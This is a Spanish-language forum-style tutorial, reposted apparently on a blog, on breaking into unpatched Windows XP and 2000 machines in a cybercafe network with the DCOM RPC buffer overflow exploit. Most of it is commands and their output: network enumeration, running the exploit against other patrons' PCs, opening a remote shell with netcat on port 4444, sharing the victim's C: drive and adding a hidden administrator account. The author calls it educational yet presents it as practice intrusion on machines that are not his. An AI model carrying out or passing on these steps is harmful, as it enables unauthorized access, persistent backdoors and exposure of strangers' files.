Intrusion por el famosisimo Exploit DCOM
Antes de comerzar este corto manualillo dire que es para uso educacional no para uso destructivo
ni nada por el estilo asi que ahora si manos a la obra.
Este exploit funka ( funciona ) solo en winxp "SIN PARCHES OJO" creo que rula con win2000 con sp4.
Estamos en un CiberCafe para hacer nuestras practicas Pre delincuenciales XD ;
bien buscaremos una Pc dentro de esta LAN donde realizar nuestras accciones.
para comenzar una vista rapida de las pcs en la red.
G:\HERRAMIENTAS UNDER\hack>net view
G:\HERRAMIENTAS UNDER\hack>net view
Servidor Descripción
----------------------------------------------
\\PC01
\\PC02
\\PC03
\\PC04
\\PC05
\\PC06
\\PC07
\\PC08
\\PC09
\\ROOT
Se ha completado el comando correctamente.
Basicamente tenemos que conseguir algo mas... su Ip interna para dirigirnos con nombre y apellido .
C:\Documents and Settings\Administrador>ping pc07
Haciendo ping a pc07 [192.168.1.7] con 32 bytes de datos:
Respuesta desde 192.168.1.7: bytes=32 tiempo<10ms TTL=128
Respuesta desde 192.168.1.7: bytes=32 tiempo<10ms TTL=128
Respuesta desde 192.168.1.7: bytes=32 tiempo<10ms TTL=128
Respuesta desde 192.168.1.7: bytes=32 tiempo<10ms TTL=128
Estadísticas de ping para 192.168.1.7:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% perdidos),
Tiempos aproximados de recorrido redondo en milisegundos:
mínimo = 0ms, máximo = 0ms, promedio = 0ms
Ya tenemos el host y la ip ; ahora nos dirijimos a un blanco nada especifico por asi decirlo .
ahora veremos que cosa comparte sino para hacerlo nosotros Wink
C:\Documents and Settings\Administrador>nbtstat -a 192.168.1.7
3COM:
Dirección IP: [192.168.1.50] Id. de ámbito : []
NetBIOS Remote Machine Name Table
Nombre Tipo Estado
---------------------------------------------
PC07 <00> UNIQUE Registrado
ENLACES <00> GROUP Registrado
PC07 <03> UNIQUE Registrado
PC07 <20> UNIQUE Registrado
ENLACES <1e> GROUP Registrado
VICTOR HUAPAYA <03> UNIQUE Registrado
Dirección MAC = 00-50-BA-85-D8-44
C:\Documents and Settings\Administrador>
Bien ahora a dirigirnos directamente a aplicar el exploit....
Para eso nos dirigimos a la ubicacion el uso del exploit bajo consola DOS para ejecutarlo .....
"OBSERVACION" :
===============
Una vez que apliquen el exploit no cierren la ventana.... sino me creen yo tampoco >-D
C:\>cd hack
C:\hack>dcom
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Ported to Win32 by Benjamin LauziÞre
- Universalized for kiddie extravaganza by da barabas
- Usage: dcom
- Targets:
- 0 Windows 2000
- 1 Windows XP
nos explica la manera de usarlo.....Ejemplos:
C:\>hack>dcom 1 192.168.1.7 =======> si la maquina es winxp
C:\>hack>dcom 0 192.168.1.7 =======> si la maquina es win2000
Ahora al ataque......... let's go fuck¡¡¡¡¡¡(perdonen mi mal inglés)
C:\hack>dcom 1 192.168.1.7
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Ported to Win32 by Benjamin LauziÞre
- Universalized for kiddie extravaganza by da barabas
- Using return address of 0x0100139d
Use Netcat to connect to 192.168.1.7:4444
Ahora ya esta el puerto abierto listo para conectarnos al puerto 4444 con NetCat je je .......
C:\hack>nc 192.168.1.7 4444
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
=====>Somo los Dioses del sistema
Con esto ya estamos adentro ahora a compartir recursos y si gustas Crearte una cuenta como root XD
Ahora a compartir recursos......
C:\WINDOWS\system32>net share compartido=c:
net share compartido=c:
El recurso compartido ha sido compartido.
Aqui podemos apreciar que usamos el comando "Net share" para poder compartir en modo DOS
de esta manera le estamos diciendo que el recurso que comparte se llamará "COMPARTIDO" y
la unidad a la cual queremos compartiren este caso "C:" (sin asteriscos).
Ahora nos vamos al entorno grafico inicio/ejecutar y digitamos \\pc07 y Oh¡¡¡¡¡ sorpresa.....
en todo caso el examen para saber si esta compartido....
C:\WINDOWS\system32>net share
net share
Nombre Recurso Descripción
----------------------------------------------------------------------
D$ D:\ Recurso predeterminado
C$ C:\ Recurso predeterminado
ADMIN$ C:\WINDOWS Admin remota
IPC$ IPC remota
compartido c:\ =====>"Esto lo hicimos nosotros"
Documentos c C:\Documents and Settings\All Users\Documentos
Se ha completado el comando correctamente.
C:\WINDOWS\system32>
Esta pc esta mas regalona......... sigamos......
En caso que hemos terminado nuestro cometido o solo probemos este exploit procedemos a quitar ese recurso compartido...
C:\WINDOWS\system32>net share compartido /delete /y ==================> compartido es el nombre del recurso.
net share compartido /delete
compartido ha sido eliminado.
Bien ahora si queremos crear nuestra cuenta root o admi je je... pos...... ni modo ..... Smiley
Pasen Al siguiente Capitulo te su Telellorona.... "pER..." me suena a Virus XD
===========================================================================================================================
===========================================================================================================================
Nos dirigimos a una maquina con Win200 con Sp4 que si rula en exploit.....no me creen pues miren....
C:\hack>dcom 0 192.168.1.9
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Ported to Win32 by Benjamin LauziÞre
- Universalized for kiddie extravaganza by da barabas
- Using return address of 0x010016c6
Use Netcat to connect to 192.168.1.9:4444
C:\hack>nc 192.168.1.9 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Ahora a ver los usuarios que tiene esta pc...
C:\WINNT\system32>net user
net user
Cuentas de usuario de \\
-------------------------------------------------------------------------------
Invitado pc09
Bien ahora asumimos que pc09 es el root no? pues veamos......
C:\WINNT\system32>net user pc09
net user pc09
Nombre de usuario pc09
Nombre completo
Comentario Cuenta para la administración del eq
uipo o dominio
Comentario del usuario
Código de país 000 (Predeterminado por el equipo)
Cuenta activa Sí
La cuenta caduca Nunca
Ultimo cambio de contraseña 9/5/2003 2:54 AM
La contraseña caduca Nunca
Cambio de contraseña 9/5/2003 2:54 AM
Contraseña requerida Sí
El usuario puede cambiar la contraseña Sí
Estaciones de trabajo autorizadas Todas
Archivo de comandos de inicio de sesión
Perfil de usuario
Directorio principal
Ultima sesión iniciada 11/20/2003 1:29 AM
Horas de inicio de sesión autorizadas Todas
Miembros del grupo local *Administradores =======>Si es admi Wink
Miembros del grupo global *Ninguno
Se ha completado el comando correctamente.
C:\WINNT\system32>
Ahora pasamos a crear nuestra propia cuenta ....
C:\WINNT\system32>net user newroot ktervas /add
net user newroot ktervas /add
Se ha completado el comando correctamente.
Hasta aqui hemos creado al usuarios: newroot y el pass: ktervas
C:\WINNT\system32>net localgroup administradores newroot /add
net localgroup administradores newroot /add
Se ha completado el comando correctamente.
Con esto completamos los derechos de admi a "newroot"
Veamos si nuestros derechos en el sistema.........
C:\WINNT\system32>net user newroot
net user newroot
Nombre de usuario newroot
Nombre completo
Comentario
Comentario del usuario
Código de país 000 (Predeterminado por el equipo)
Cuenta activa Sí
La cuenta caduca Nunca
Ultimo cambio de contraseña 11/20/2003 3:36 AM
La contraseña caduca 1/2/2004 2:24 AM
Cambio de contraseña 11/20/2003 3:36 AM
Contraseña requerida Sí
El usuario puede cambiar la contraseña Sí
Estaciones de trabajo autorizadas Todas
Archivo de comandos de inicio de sesión
Perfil de usuario
Directorio principal
Ultima sesión iniciada Nunca
Horas de inicio de sesión autorizadas Todas
Miembros del grupo local *Administradores
*Usuarios
Miembros del grupo global *Ninguno
Se ha completado el comando correctamente.
C:\WINNT\system32>
En conclusion ya somoS root je je je je.... y podemos realizar mas cosas...
Despedida:
==========
No trato de dar una clase sobre estos tipos de ataques que son muy sencillos de realizar
pero el hecho es que aqui se debe tener un poco de conocimiento de los siguientes comandos.
C:\Documents and Settings\Administrador>net
La sintaxis de este comando es:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Uso pocas herramientas solo un exploit auque eso se podria hacer con software adicional...
Es muy amplio y las cosas que se puede hacer son ellos pero ya esta en cada uno aprenderlos
PD: *No se si es permitido agregar articulos al Taller, o solo es para preguntas y comentarios, de ser asi, mil disculpas a los moderadores.
* Las tools se pueden encontrar en varias listas de seguridad como securityreason[dot]com o tambien las he subido http://santopekado.googlepages.com/alderson.html
Saludos All
SantoPekado
Fuente: http://comunidad.dragonjar.org/index.php?topic=113.0
No hay comentarios:
Publicar un comentario